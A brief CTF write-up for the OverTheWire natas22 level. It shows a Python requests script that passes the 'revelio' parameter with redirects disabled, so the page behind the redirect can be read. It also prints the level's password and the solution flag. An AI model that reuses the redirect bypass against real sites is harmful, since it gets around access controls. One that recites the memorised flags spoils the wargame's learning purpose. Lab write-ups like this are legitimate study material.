← Back
natas22 | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

here if you give the get param: revelio it tries to redirect you. i wrote simple script [level22.py]


import requests
import base64

URL = "http://natas22.natas.labs.overthewire.org"

username = "natas22"
password = "d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz"
cookies = {'PHPSESSID':''}
headers = {"authorization":'Basic {0}'.format(base64.b64encode(f"{username}:{password}".encode()).decode())}

params = {'revelio':''}

response = requests.get(URL, params=params, cookies=cookies, headers=headers, allow_redirects=False)

print(response.text)

and disabled the redirection

Flag: dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs